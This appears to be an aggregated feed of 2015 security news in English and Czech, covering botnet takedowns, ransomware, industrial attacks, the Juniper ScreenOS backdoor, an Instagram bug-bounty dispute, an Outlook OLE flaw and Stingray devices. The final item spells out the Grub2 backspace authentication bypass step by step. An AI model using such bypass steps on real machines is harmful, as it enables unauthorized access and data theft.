In April, Kaspersky Lab was involved in the take-down of the Simda botnet, co-ordinated by the Interpol Global Complex for Innovation. The investigation was started by Microsoft and expanded to other participants, including Trend Micro, the Cyber Defense Institute, officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI, the Police Grand-Ducale Section Nouvelles Technologies in Luxembourg, and the Russian Ministry of the Interior’s Cybercrime Department ‘K’ supported by the INTERPOL National Central Bureau in Moscow. As a result of the operation, 14 servers in the Netherlands, the US, Luxembourg, Poland and Russia were taken down. Preliminary analysis of some of the sink-holed server logs revealed that 190 countries had been affected by the botnet

In 2015, there have been some notable international police operations #KLReport
In September, the Dutch police arrested two men for suspected involvement in CoinVault ransomware attacks, following a joint effort by Kaspersky Lab, Panda Security and the Dutch National High Tech Crime Unit (NHTCU). This malware campaign started in May 2014 and continued into this year, targeting victims in more than 20 countries, with the majority of victims in the Netherlands, Germany, the United States, France and Great Britain. They successfully encrypted files on more than 1,500 Windows-based computers, demanding payment in bitcoin to decrypt data. The cybercriminals responsible for this ransomware campaign modified their creations several times to keep on targeting new victims. In November 2014, Kaspersky Lab and the Dutch NHTCU launched a web site to act as a repository of decryption keys; and we also made available online a decryption tool to help victims recover their data without having to pay the ransom. You can find our analysis of the twists and turns employed by the CoinVault authors here. Ransomware has become a notable fixture of the threat landscape. While this case shows that collaboration between researchers and law enforcement agencies can lead to positive results, it’s essential for consumers and businesses alike to take steps to mitigate the risks of this type of malware. Ransomware operations rely on their victims paying up. In September, an FBI agent caused controversy by suggesting that victims should pay the ransom in order to recover their data. While this might seem to be a pragmatic solution (not least because there are situations where recovery of data is not possible), it’s a dangerous strategy. First, there’s no guarantee that the cybercriminals will provide the necessary mechanism to decrypt the data. Second, it reinforces their business model and makes the further development of ransomware more likely. We would recommend that businesses and individuals alike make regular backups of data, to avoid being put in this invidious position

Attacks on industrial objects

Incidents caused by cybersecurity problems are a fairly regular occurrence at industrial objects. For example, according to US ICS CERT data, 245 such incidents were recorded in the US during the 2014 fiscal year, and 22 incidents in July and August 2015. However, we believe these numbers do not reflect the actual situation: there are many more cyber incidents than this. And while enterprise operators and owners prefer to keep quiet about some of these incidents, they are simply unaware of others

Let’s have a look at two cases that caught our attention in 2015

One is an incident that took place at a steel mill in Germany. Towards the end of 2014, the German Federal Office for Information Security (Bundesamt für Sicherheit in der Informationstechnik, BSI) published a report (see Appendix on English) which mentioned a cyber incident at a German steel mill. The incident resulted in physical damage to a blast furnace

This is the second cyberattack that we know of, after Stuxnet, to cause physical damage to industrial facilities. According to BSI, the attackers first used phishing emails to infect the enterprise’s office network, after which the hackers managed to infect a SCADA computer and attack the physical equipment. Unfortunately, BSI did not provide any additional information, so we do not know which malware was used and how it operated

This secrecy is bad for everybody: operators of other similar enterprises (with the possible exception of German facilities) will not be able to analyze the attack and implement countermeasures; cybersecurity experts are also in the dark and are unable to suggest security measures to their customers

Incident in Germany – the second cyberattack, after Stuxnet, to cause physical damage to facilities #KLReport
Another curious incident was an attack against the Frederic Chopin Airport in Warsaw in June 2015., The computer system responsible for preparing flight plans for LOT, Poland’s national airline, was taken down for about five hours one Sunday. According to Reuters, this caused delays to a dozen flights

The airport management provided no details and experts had to form their opinions based on their experience. Ruben Santamarta, Principal Security Consultant at IOActive, has previously called attention to IT security issues in aviation. Based on what the LOT representatives said, he suggested that the company had fallen victim to a targeted attack: the system couldn’t generate flight plans because key nodes in the back office were compromised, or perhaps the attack targeted ground communication devices, resulting in the inability to perform or validate data loading on aircraft (including flight plans)

Our experts also responded to the incident, suggesting there could be two possible scenarios. The incident may have been the result of human error or equipment malfunction. Alternatively, the incident at the relatively small Warsaw airport could be a precursor of larger-scale attacks in other, much larger, airports

It was later announced that a DDoS attack had taken place and that no penetration had actually taken place. Once again, no detailed information about the incident was disclosed and we can either believe the official information or guess at the real reasons and goals of the attack

Whoever was behind the attacks described above and whatever goals they pursued, these incidents clearly demonstrate how significant a part of our lives computers have become and how vulnerable infrastructure objects have become in recent years

Unfortunately, today many governments and regulators resort to a policy of secrecy. We believe that transparency and the exchange of information about cyberattacks is an important part of providing adequate protection for industrial objects. Without this knowledge, it is very hard to protect these objects against future threats

In conclusion, we would like to mention one more trend that is already relevant and will continue to affect us all in the coming years: the hardware used by industrial enterprises is being actively connected to the Web. The Internet may have appeared quite a long time ago, but it is only now that it is being introduced to industrial processes. It is no exaggeration to say that this represents a new industrial revolution: we are witnessing the birth of the ‘Industrial Internet of Things’ or Enterprise 4.0. As a result, enterprises receive a whole host of additional benefits and can improve their manufacturing efficiency

We are witnessing the birth of a new industrial revolution – the ‘Industrial Internet of Things’ #KLReport
In order to keep up with this trend, equipment manufacturers simply add sensors and controllers to proven, safe and reliable equipment originally developed for the ‘offline’ world, provide Internet connectivity for their devices and then offer this ‘new equipment’ to customers. They forget, however, that when online features are added to any device, this gives rise to new cybersecurity-related risks and threats. This is no longer a ‘physical’ device, but a ‘cyber-physical’ one

In the world of physical devices, all industrial devices, instruments, communication protocols, etc. were designed with safety in mind – in other words, they were built to be foolproof. This meant that if a device was designed to meet functional safety requirements, operating it without violating the safety rules would not result in any failures or damage to people or the environment

Enterprise 4.0 brings with it a new security dimension: IT security or protection against intentional external manipulation. You cannot simply connect an object or device from the pre-Internet era to the Internet: the consequences of this can be – and often are – disastrous

Engineers who embrace old ‘pre-revolutionary’ design principles often fail to realize that their devices can now be ‘operated’ not only by engineers, who know which actions are admissible and which are not, but also by hackers for whom there is no such thing as inadmissible remote object operations. This is one of the main reasons why today some well-established companies with many years of experience offer hardware that may be reliable from the point of view of functional safety, but which does not provide an adequate level of cybersecurity

In the world of cyber-physical devices, physical and cyber components are tightly integrated. A cyberattack can disrupt an industrial process, damage equipment or cause a technogenic disaster. Hackers are a real threat and anything that is connected to the Internet can be attacked. This is why equipment manufacturers, when designing new connected industrial equipment, should be as careful about implementing protection against cyberthreats as they are about designing functional safety features.


In 2015, perhaps for the first time in the entire history of the Internet, issues related to protecting networks and being protected online were discussed in connection with every sector of the economy and with people’s everyday life. Choose any sector of modern civilization – finances, industrial production, cars, planes, wearable devices, healthcare and many others – and you will be sure to find publications this year on incidents or cybersecurity problems related to that sector.

Regrettably, cybersecurity has now become inseparably linked with terrorism. Defensive, as well as offensive, methods used online are attracting lots of interest from various illegal organizations and groups.

Cybersecurity issues have risen to the level of top diplomats and government officials. In 2015, cybersecurity agreements were signed between Russia and China, China and the US, China and the UK. In these documents, governments not only agree to cooperate, but also accept the responsibility to refrain from any attacks on each other. At the same time, there was extensive discussion of recent changes to the Wassenaar Arrangement restricting spyware exports. A recurring theme of the year was the use of insecure email services by various political figures across the globe, including the then US Secretary of State Hillary Clinton.

All this has led to a huge surge in interest in cybersecurity issues, not only from the mass media but also from the entertainment industry. There were feature films and TV series produced, some of them starring cybersecurity experts, sometimes as themselves.

The word cybersecurity became fashionable in 2015, but this does not mean the problem has been solved. We are seeing what amounts to exponential growth in everything related to cybercrime, including increases in the number of attacks and attackers, the number of victims, defense and protection related costs, laws and agreements that regulate cybersecurity or establish new standards. For us, this is primarily about the sophistication of the attacks we detect. The confrontation is now in the active stage, with the final stage not even on the horizon.

Kterak lidská chyba způsobí kolaps celého IT

19.12.2015 Bezpečnost
IT služby mohou zcela zhavarovat i na základě jediné lidské chyby. A zatím to nevypadá, že by se podařilo zajistit, aby lidé chyby nedělali.

Existuje pramálo důkazů, že by zlepšování procesů, bezpečnostní školení či pokroky technologií nějak omezovaly lidské chyby v IT provozu. Když nic jiného, tak roste riziko technologických katastrof navzdory veškerým snahám, které se v tomto odvětví udělají.

Narušení bezpečnosti a výpadky IT se dějí stále častěji a navíc se jejich dopad stále zhoršuje: Roste totiž počet lidí, u nichž je riziko, že budou každým novým incidentem ovlivnění, protože stoupá vzájemná provázanost uživatelů.

Příčiny problému

Jaký je společný bod selhání u téměř každého incidentu? Lidská chyba. Lidé jsou nějakým způsobem zodpovědní za většinu IT katastrof. To vedlo (samozřejmě kromě dalších technologií) ke zvýšenému zájmu o nástroje umělé inteligence (AI) v naději, že se tím posílí zabezpečení a spolehlivost.

Nové technologie a metody však přinášejí další, zatím neexistující rizika. Stephen Hawking nedávno jako fyzik a kosmolog poznamenal: „Vývoj plné umělé inteligence by mohl znamenat konec lidské rasy.“ A zničení lidstva, řízené umělou inteligencí, by samozřejmě bylo největší selhání IT vůbec.

Vzhledem k pokračujícím a zdánlivě nezastavitelným řetězům selhání zabezpečení informací to však může být riziko, které se vyplatí.

Důkazy jsou totiž neúprosné: Jen za posledních několik měsíců došlo například ke gigantickému narušení systémů řetězce Home Depot, kdy unikly informace o 56 milionech platebních karet, a z finanční instituce JPMorgan Chase bylo ukradeno 76 milionů jmen a adres. Firma Hold Security vloni odhadla, že gang ruských zločinců se jménem CyberVors ukradl více než 1,2 miliardy unikátních kombinací e-mailových adres a hesel ze 420 tisíc webů a serverů FTP.

A ještě jednou – ani nejsilnější bezpečnostní ochrany IT při ochraně dat nic nezmohou, když někdo udělá chybu: Ve své analýze „Security Services 2014 Cyber Security Intelligence Index“ analytici IBM zjistili, že lidská chyba je jednou z příčin v 95 % zkoumaných případů.

Ohrožení doby provozu

Výpadky IT sice nezpůsobují tak velký rozruch jako úniky dat, ale mohou být podobně ničivé. Datová centra mohou tvrdit, že nabízejí 99,999% dostupnost (tedy s prostojem za rok omezeným na pouhých 5 minut a 26 sekund), hlavní poskytovatelé cloudových služeb pak proklamují dostupnost nejméně 99,99 % (to znamená, že výpadek nesmí přesáhnout 52 minut a 56 sekund za rok), ale výpadky se stále objevují.

Celková rizika z těchto nefungujících služeb rostou proto, že se nyní mezi hrstku poskytovatelů cloudu koncentruje příliš mnoho kritických IT služeb. Malé lidské chyby mohou snadno způsobit velké problémy, které ovlivní velký počet uživatelů.

Například Amazon uváděl, že jeho nedávný výpadek způsobila změna konfigurace, která byla „vykonána nesprávně“. Microsoft zase podotkl, že nedávný problém s jeho platformou Azure způsobila aktualizace systému. A není výjimkou, že dochází i k výpadkům služeb Google Gmail, Facebook nebo Yahoo Mail.

Uptime Institute uvádí, že analýza dat o abnormálních incidentech za dobu 20 let ukazuje, že lidská chyba je na vině ve více než 70 % všech výpadků datových center. Tato selhání jsou nyní navíc dražší než v minulosti.

Když společnost Kroll Ontrack, poskytovatel služeb pro obnovu dat, udělala průzkum mezi svými zákazníky ohledně ztráty dat, uvedla třetina respondentů, že hlavní příčinou byly poruchy desktopů a serverů, zatímco pouze 14 % uvedlo, že by ztráty mohly způsobit lidské chyby. To druhé číslo však není tak malé, jak by se mohlo zdát.

Jeff Pederson, manažer obchodu pro obnovu dat ve společnosti Kroll, poznamenává, že 25 až 30 % obratu jeho firmy tvoří obnova dat ztracených v důsledku lidské chyby.

Trocha prevence

Standardní odpovědí, když se něco pokazí, je připomenout uživatelům, že obnova po havárii je sdílenou odpovědností. Existují však konkrétní kroky, které uživatelé, dodavatelé a poskytovatelé služeb IT mohou udělat, aby předcházeli výpadkům a narušením.

Jedním z kroků je používání osvědčených postupů. Například CenturyLink, globální poskytovatel datových center, nedávno obdržel od konsorcia Uptime Institute certifikát Management and Operations Stamp of Approval pro svých 57 datových center. Tento certifikační program uznává zařízení s přísnými procesy řízení provozu.

Drew Leonard, viceprezident CenturyLink, uvedl, že snaha udržet bezchybný provoz je zásadní, protože výpadek může poškodit pověst datového centra na celá léta.

Dodavatelé se také obracejí k novým bezpečnostním nástrojům, které se spoléhají na prediktivní analýzy a strojové učení, aby umožnily uživatelům „pokusit se zasáhnout před vznikem evidentních škod“, uvádí John McClurg, ředitel zabezpečení v Dellu.

Myšlenkou je využívat strojovou analýzu incidentů, a interpretaci přitom nechat na lidi, říká Kevin Conklin, viceprezident pro marketing a strategie ve společnosti Prelert, která se specializuje na systémy strojového učení. „Lidé jsou ale velmi nepředvídatelní,“ dodává Conklin.

Firewally Juniperu obsahují špionážní software, přiznal výrobce

18.12.2015 Sledování
Přední výrobce síťových zařízení Juniper oznámil, že v některých modelech svých firewallů nalezl špionážní kód. Mezi postižené produkty patří ty se systémem ScreenOS. Ten přitom běží na celé řadě firewallů Juniperu.

„Neautorizovaný kód byl nalezen při nedávné údržbě systému,“ oznámil Bob Worrall, CIO Juniperu. Nenaznačil však, odkud by škodlivý software mohl pocházet. Juniper již vydal patche, které by měly problémy opravit.

„Dosud jsme neobdrželi žádné zprávy o tom, že by tyto chyby byly zneužity. Doporučujeme však našim klientům update systému a instalaci nejnovějších patchů,“ dodává Worrall.

Společnost při své inspekci odhalila dva kritické problémy. Kvůli jednomu bylo možné získat vzdálený administrátorský přístup k zařízení se ScreenOS přes telnet nebo SSH. „Ačkoliv log soubory by ukazovaly pokus o vzdálený přístup, zkušený útočník by tyto údaje dokázal smazat a odstranit tak veškeré důkazy o zneužití zařízení,“ píše Juniper.

Druhá chyba umožňovala útočníkovi schopnému monitorovat VPN (virtual private networks) možností tyto sítě dešifrovat. VPN jsou zašifrovaná spojení mezi počítačem a jinými zařízeními. Využívají je zejména firmy k zajištění bezpečných vzdálených přístupů například pro své zaměstnance na cestách. Podle tvrzení Juniperu by nebylo možné žádným způsobem zjistit, zda byla tato chyba někým zneužita.

První verze ScreenOS, která byla chybami postižená, byla vydána v září 2012. Útočníci tak mohli mít ke korporátním VPN přístup poměrně dlouhou dobu. Tyto firewally jsou pro hackery oblíbeným cílem, protože firemní přístroje často zahrnují veškeré informace proudící do a ze společnosti.

Tento případ postižení softwaru významného výrobce připomíná operace Americké bezpečnostní agentury (NSA), jejíž špionážní činnost v roce 2013 poodhalil její bývalý zaměstnanec Edward Snowden.

V prosinci 2013 pak německý deník Der Spiegel zveřejnil padesátistránkový katalog veškerého hardwaru a softwaru, které NSA využívala k infiltraci amerických přístrojů. Patřily mezi ně také systémy Juniperu, ale i firem jako Cisco nebo Huawei.

Shocking! Instagram HACKED! Researcher hacked into Instagram Server and Admin Panel
Ever wonder how to hack Instagram or how to hack a facebook account? Well, someone just did it!
But, remember, even responsibly reporting a security vulnerability could end up in taking legal actions against you.
An independent security researcher claims he was threatened by Facebook after he responsibly revealed a series of security vulnerabilities and configuration flaws that allowed him to successfully gained access to sensitive data stored on Instagram servers, including:
Source Code of Instagram website
SSL Certificates and Private Keys for Instagram
Keys used to sign authentication cookies
Personal details of Instagram Users and Employees
Email server credentials
Keys for over a half-dozen critical other functions
However, instead of paying him a reward, Facebook has threatened to sue the researcher of intentionally withholding flaws and information from its team.
Wesley Weinberg, a senior security researcher at Synack, participated in Facebook's bug bounty program and started analyzing Instagram systems after one of his friends hinted him to a potentially vulnerable server located at
The researcher found an RCE (Remote Code Execution) bug in the way it processed users’ session cookies that are generally used to remember users' log-in details.
Remote code execution bug was possible due to two weaknesses:
The Sensu-Admin web app running on the server contained a hard-coded Ruby secret token
The host running a version of Ruby (3.x) that was susceptible to code execution via the Ruby session cookie
Exploiting the vulnerability, Weinberg was able to force the server to vomit up a database containing login details, including credentials, of Instagram and Facebook employees.
Although the passwords were encrypted with ‘bcrypt’, Weinberg was able to crack a dozen of passwords that had been very weak (like changeme, instagram, password) in just a few minutes.
Exposed EVERYTHING including Your Selfies
Weinberg did not stop here. He took a close look at other configuration files he found on the server and discovered that one of the files contained some keys for Amazon Web Services accounts, the cloud computing service used to host Instagram's Sensu setup.
These keys listed 82 Amazon S3 buckets (storage units), but these buckets were unique. He found nothing sensitive in the latest file in that bucket, but when he looked at the older version of the file, he found another key pair that let him read the contents of all 82 buckets.
Weinberg had inadvertently stumbled upon almost EVERYTHING including:
Instagram's source code
SSL certificates and private keys (including for and *
API keys that are used for interacting with other services
Images uploaded by Instagram users
Static content from the website
Email server credentials
iOS/Android app signing keys
Other sensitive data
"To say that I had gained access to basically all of Instagram's secret key material would probably be a fair statement," Weinberg wrote in his blog. "With the keys I obtained, I could now easily impersonate Instagram, or any valid user or staff member. While out of scope, I would have easily been able to gain full access to any user’s account, [personal] pictures and data."
Responsible Disclosure, but Facebook Threatens Lawsuit
Weinberg reported his findings to Facebook's security team, but the social media giant was concerned he had accessed private data of its users and employees while uncovering the issues.
Instead of receiving a reward from Facebook for his hard work, Weinberg was unqualified for the bug bounty program by Facebook.
In early December, Weinberg claims his boss Synack CEO, Jay Kaplan, received a scary call from Facebook security chief Alex Stamos regarding the weaknesses Weinberg discovered in Instagram that left Instagram and Facebook users wide open to a devastating attack.
Stamos "stated that he did not want to have to get Facebook's legal team involved, but that he was not sure if this was something he needed to go to law enforcement over," Weinberg wrote in his blog in a section entitled 'Threats and Intimidation.'
In response, Stamos issued a statement, saying he "did not threaten legal action against Synack or [Weinberg] nor did [he] ask for [Weinberg] to be fired."
Stamos said he only told Kaplan to "keep this out of the hands of the lawyers on both sides."
"Condoning researchers going well above and beyond what is necessary to find and fix critical issues would create a precedent that could be used by those aiming to violate the privacy of our users, and such behavior by legitimate security researchers puts the future of paid bug bounties at risk," Stamos added.
Facebook Responds
After the original publication by the researcher, Facebook issued its response, saying the claims are false and that Weinberg was never told not to publish his findings, rather only asked not to disclose the non-public information he accessed.
The social media giant confirmed the existence of the remote code execution bug in the domain and promised a bug bounty of $2,500 as a reward to Weinberg and his friend who initially hinted that the server was openly accessible.
However, the other vulnerabilities that allowed Weinberg to gain access to sensitive data were not qualified, with Facebook saying he violated user privacy while accessing the data.
Here's the full statement by Facebook:
We are strong advocates of the security researcher community and have built positive relationships with thousands of people through our bug bounty program. These interactions must include trust, however, and that includes reporting the details of bugs that are found and not using them to access private information in an unauthorized manner. In this case, the researcher intentionally withheld bugs and information from our team and went far beyond the guidelines of our program to pull private, non-user data from internal systems.
We paid him for his initial bug report based on the quality, even though he was not the first to report it, but we didn't pay for the subsequent information that he had withheld. At no point did we say he could not publish his findings — we asked that he refrain from disclosing the non-public information he accessed in violation of our program guidelines. We remain firmly committed to paying for high quality research and helping the community learn from researchers' hard work.

Juniper Firewalls with ScreenOS Backdoored Since 2012
Juniper Networks has announced that it has discovered "unauthorized code" in ScreenOS, the operating system for its NetScreen firewalls, that could allow an attacker to decrypt traffic sent through Virtual Private Networks (VPNs).
It's not clear what caused the code to get there or how long it has been there, but the release notes posted by Juniper suggest the earliest buggy versions of the software date back to at least 2012 and possibly earlier.
The backdoor impacts NetScreen firewalls using ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20, states the advisory published by the company. However, there's no evidence right now that whether the backdoor was present in other Juniper OSes or devices.
The issue was uncovered during an internal code review of the software, according to Juniper chief information officer Bob Worrall, and requires immediate patching by upgrading to a new version of the software just released today.
"Juniper discovered unauthorized code in ScreenOS that could allow a knowledgeable attacker to gain administrative access to NetScreen devices and to decrypt VPN connections," Worrall said.
How Does the Backdoor Occur?
The backdoor occurred due to a pair of critical vulnerabilities:
First allows anyone to decrypt VPN traffic and leave no trace of their actions
Second allows anyone to complete compromise a device via an unauthorized remote access vulnerability over SSH or telnet.
In short, an attacker could remotely log-in to the firewall with administrator privileges, decrypt and spy on thought-to-be-secure traffic, and then even remove every trace of their activity.
Sounds awful, although Juniper claims the company has not heard of any exploitation in the wild so far and released patched versions of Screen OS that are available now on its download page.

Unauthorized code found in Juniper’s firewall OS

An operating system running on firewalls sold by Juniper Networks contains unauthorized code that could be exploited to decrypt traffic sent through virtual private networks.
An “unauthorized code” was discovered in the operating system for Juniper NetScreen firewalls. The company admitted the presence of the “unauthorized code” that could allow an attacker to decrypt VPN traffic.

[“unauthorized code”] “could allow a knowledgeable attacker to gain administrative access to NetScreen devices and to decrypt VPN connections.”

According to The Register, the presence of the unauthorized code could date back to 2008, the experts referred a 2008 notice issued by Juniper’s about a security issued that impacts ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20. ScreenOS 6.2 was released. The Screen OS 6.3 was presented in 2009.

“During a recent internal code review, Juniper discovered unauthorized code in ScreenOS that could allow a knowledgeable attacker to gain administrative access to NetScreen devices and to decrypt VPN connections,” Juniper Chief Information officer Bob Worrall wrote. “Once we identified these vulnerabilities, we launched an investigation into the matter, and worked to develop and issue patched releases for the latest versions of ScreenOS.” states the advisory.

The experts explained that there are several releases with numerous versions of the Juniper products and the unauthorized code was only found in some of them.

juniper firewall unauthorized code

A separate advisory issued by the company confirm the presence of two separate vulnerabilities in its products, the first one allows unauthorized remote administrative access to an affected device over SSH or telnet, “The second issue may allow a knowledgeable attacker who can monitor VPN traffic to decrypt that traffic,” the advisory said. “It is independent of the first issue. There is no way to detect that this vulnerability was exploited.”

The presence of unauthorized code is disconcerting, one of the most important vendors of security appliances inserted an unauthorized code in a number of its products.

Giving the nature of the code it is difficult to think that the code was accidentally “inserted” in the OS, it is likely that it was used to monitor customers’ confidential communications.

Users urge to update their products, Juniper has issued an out-of-band patch to fix the issue.

Microsoft Outlook flaw opens the door to “mailbomb” attacks

Microsoft fixed a vulnerability in Microsoft Outlook that could allow remote code execution if the victim opens a specially crafted Office doc.
Microsoft recently fixed a number of critical bugs with the last “Patch Tuesday” issued on December 8, including an update to the Microsoft Office suite to fix a number of security issues. One of the flaws, the CVE-2015-6172 vulnerability, could be exploited by attackers for remote code execution through a “specially crafted Microsoft Office file”.

“This security update resolves vulnerabilities in Microsoft Office. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted Microsoft Office file. An attacker who successfully exploited the vulnerabilities could run arbitrary code in the context of the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.” states the Microsoft Security Bulletin.

The vulnerability affects Office 2010 and later, as well as Microsoft Word 2007 with Service Pack 3.

As explained by the security researcher Haifei Li in a paper entitled “BadWinmail: The ‘Enterprise Killer’ Attack Vector in Microsoft Outlook,” and attacker can exploit the vulnerability by sending a crafted attachment via e-mail to bypass Outlook’s layers of security by exploiting Office’s Object Linking and Embedding (OLE) capabilities and Outlook’s Transport Neutral Encapsulation Format (TNEF).

The winmail.dat file includes instructions on how to Microsoft Office handles attachments, before the patch release OLE objects were rendered within the e-mail and call code from the application they’re based on escaping the Outlook security “sandbox.”

“When the value of the ‘PidTagAttachMethod’ [within winmail.dat] is set to ATTACH_OLE (6),” Haifei wrote, “the ‘attachment file’ (which is another file contained in the winmail.dat file) will be rendered as an OLE object.”

As a result, an attacker could create a specific a TNEF e-mail and send it to the targeted user to launch the attack.

“Such a feature could allow us to “build” a TNEF email and send it to the user, when the user reads the email, the embedded OLE object will be loaded automatically. ” states the expert. ” According to the author’s tests, various OLE objects can be loaded via emails; this poses a big security problem.”

Microsoft Outlook attack

Phishing attacks that rely on this technique are very dangerous because to compromise the victim machine, it is sufficient that the malicious message is viewed by the user.

“By packing a Flash exploit in an OLE enabled TNEF e-mail, an attacker can [achieve] full code execution as long as the victim reads the e-mail,” he reported. “We use Flash OLE object as an example since Flash (zero-day) exploits are easy to obtain by attackers, but please note that there are other OLE objects [that] may be abused by [an] attacker.”

Haifei noted that the vulnerability could also be triggered by the content of the email instead the attachment because Outlook automatically considers .msg files as “safe” and opens them in an Outlook message view rather than sandboxing them. This means that OLE content embedded in the content of the email will be automatically opened.

Don’t waste time, apply the patch and turn off the message preview pane in Microsoft Outlook.

Haifei also suggested to change to registry keys with an “Office kill-bit” to block Flash content from automatically opening via OLE, by blocking the CLSID D27CDB6E-AE6D-11cf-96B8-444553540000.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}]"Compatibility Flags"=dword:00000400
This setting will prevent protect you from OLE-embedded Flash exploits.

Hackers trace ISIS Twitter accounts back to the UK govt

A group of hackers known as VandaSec claims three ISIS Twitter accounts trace back to computers belonging to the UK government.
According to the revelation of a group of hackers known as VandaSec, at least three Islamic State Twitter social media accounts are run from IP addresses linked to the British government’s Department for Work and Pensions (DWP).
VandaSec has discovered the internet protocol (IP) addresses used by three jihadists to access Twitter accounts involved in the activities of propaganda and online recruitment.
According to the Daily Mirror, the IP addresses belong to the DWP’s London offices.

“Hackers have claimed that a number of Islamic State supporters’ social media accounts are being run from internet addresses linked to the Department of Work and Pensions. A group of four young computer experts who call themselves VandaSec have unearthed evidence indicating that at least three ISIS-supporting accounts can be traced back to the DWP.”

“Don’t you think that’s strange?” said one of the hackers to the Daily Mirror. “We traced these accounts back to London, the home of the British intelligence services,” they added.

isis paris attacks post propaganda

There are two hypotheses on the strange discovery:
There are ISIS Sympathizers inside the British government.
The accounts are used by the British intelligence to identify wannabe terrorists and other members of the organization.
The addresses were thought to be based in Saudi Arabia, in reality, the Cabinet Office admitted to selling IP addresses to two Saudi companies earlier this year, this is the reason why the IP appears to be linked to the British Government.

“The government owns millions of unused IP addresses which we are selling to get a good return for hardworking taxpayers,” a Cabinet Office spokesperson said. “We have sold a number of these addresses to telecoms companies, both in the UK and internationally, to allow their customers to connect to the internet.” “We think carefully about which companies we sell addresses to, but how their customers use this internet connection is beyond our control.”

A secret cellphone spying devices catalog leaked online

Someone in the Intelligence community leaked online a secret catalog of cellphone spying devices used by law enforcement.
The Intercept has leaked online a secret catalog of cellphone spying devices, the precious document has been given to the online publication by someone inside the intelligence community.

The person who passed the document to The Intercept declared to be concerned about the growing militarization of domestic law enforcement.

“The Intercept obtained the catalogue from a source within the intelligence community concerned about the militarization of domestic law enforcement. (The original is here.)” states the post published on the Intercept.

“A few of the devices can house a “target list” of as many as 10,000 unique phone identifiers. Most can be used to geolocate people, but the documents indicate that some have more advanced capabilities, like eavesdropping on calls and spying on SMS messages. Two systems, apparently designed for use on captured phones, are touted as having the ability to extract media files, address books, and notes, and one can retrieve deleted text messages.”

Stingray cellphone spying devices

The catalog includes 53 cellphone spying devices, including Stingray I/II surveillance boxes and Boeing “dirt boxes.”

There are some devices small enough to fit in a backpack such as the REBUS Ground Based Geo-Location that “provides limited capability to isolate targets utilizing Firewall option.”

The document also includes many other cellphone spying devices that are less popular of the Stingray that could be used by law enforcement and intelligence agencies in various scenarios, including the deployment on drones and aircraft.

One of the spying devices is sold by the NSA, while another was designed for use by the CIA.

These systems are a long debated because they allow authorities to conduct dragnet surveillance, the cellphone spying devices have been used by local law enforcement agencies across the United States for a long time.

“The archetypical cell-site simulator, the Stingray, was trademarked by Harris Corp. in 2003 and initially used by the military, intelligence agencies, and federal law enforcement.” continues the post. “Another company, Digital Receiver Technology, now owned by Boeing, developed dirt boxes — more powerful cell-site simulators — which gained favor among the NSA, CIA, and U.S. military as good tools for hunting down suspected terrorists. The devices can reportedly track more than 200 phones over a wider range than the Stingray.”

The Intercept also reported the case of Marc Raimondi who was employed by the Harris company and that now is a Department of Justice spokesman who claim the agency’s use of Stingray cellphone spying devices is legal.

Jennifer Lynch, a senior staff attorney at the Electronic Frontier Foundation has repeatedly expressed its disappointment at the use of these devices in a domestic context.

“We’ve seen a trend in the years since 9/11 to bring sophisticated surveillance technologies that were originally designed for military use—like Stingrays or drones or biometrics—back home to the United States,” said Jennifer Lynch “But using these technologies for domestic law enforcement purposes raises a host of issues that are different from a military context.”

I suggest you to give a look to the document, it is full of interesting things.

Sophos pomocí akvizice vylepší ochranu koncových bodů

18,12,2015 Ochrany
Převzetí holandské firmy SurfRight zaměřené na detekci a řešení hrozeb souvisejících s koncovými body a na prevenci proti pokročilým hrozbám, oznámil Sophos.

SurfRight vyvinul portfolio technologií, které umožňují předcházet, detekovat a řešit specializované hrozby i útoky využívající dosud nezveřejněných zranitelností (tzv. zero-day útoky). Využívají se k tomu mechanismy narušení vektorů malware i přetrvávajících pokročilých hrozeb (APT).

Součástí tohoto portfolia je i technologie, která proti zranitelnostem bojuje v reálném čase pomocí odhalování a předcházení manipulacím s operační pamětí a dokáže tak zabránit zneužitím vedoucím k prvotnímu spuštění malware.

Sophos zahájí práce na integraci technologií značky SurfRight do svých řešení pro ochranu koncových bodů podle svých slov okamžitě.

Technologie SurfRightu podle něj zvýší efektivitu synchronizované ochrany, kdy se využívá více prvků, jako je ochrana sítí a koncových bodů, a to včetně aktivní a neustálé komunikace mezi každým z nich. To umožňuje rychlejší odhalování hrozeb a významné snížení času i zdrojů nutných k prozkoumání a vyřešení bezpečnostních incidentů.

You can Hack into a Linux Computer just by pressing 'Backspace' 28 times
So what would anyone need to bypass password protection on your computer?
It just needs to hit the backspace key 28 times, for at least the computer running Linux operating system.
Wait, what?
A pair of security researchers from the University of Valencia have uncovered a bizarre bug in several distributions of Linux that could allow anyone to bypass any kind of authentication during boot-up just by pressing backspace key 28 times.
This time, the issue is neither in a kernel nor in an operating system itself, but rather the vulnerability actually resides in Grub2, the popular Grand Unified Bootloader, which is used by most Linux systems to boot the operating system when the PC starts.
Also Read: GPU-based Linux Rootkit and Keylogger.
The source of the vulnerability is nothing but an integer underflow fault that was introduced with single commit in Grub version 1.98 (December 2009) – b391bdb2f2c5ccf29da66cecdbfb7566656a704d – affecting the grub_password_get() function.
Here's How to Exploit the Linux Vulnerability
If your computer system is vulnerable to this bug:
Just hit the backspace key 28 times at the Grub username prompt during power-up. This will open a "Grub rescue shell" under Grub2 versions 1.98 to version 2.02.
This rescue shell allows unauthenticated access to a computer and the ability to load another environment.
From this shell, an attacker could gain access to all the data on your computer, and can misuse it to steal or delete all the data, or install persistent malware or rootkit, according to researchers Ismael Ripoll and Hector Marco, who published their research on Tuesday.
Here's How to Protect Linux System
The Grub vulnerability affects Linux systems from December 2009 to the present date, though older Linux systems may also be affected.
Also Read: Is This Security-Focused Linux Kernel Really UnHackable?
The good news is the researchers have made an emergency patch to fix the Grub2 vulnerability. So if you are a Linux user and worried your system might be vulnerable, you can apply this emergency patch, available here.
Meanwhile, many major distributions, including Ubuntu, Red Hat, and Debian have also released emergency patches to fix the issue.
Linux is often thought to be a super secure operating system compare to others, and this Grub vulnerability could be a good reminder that it's high time to take physical security just as seriously as network security.

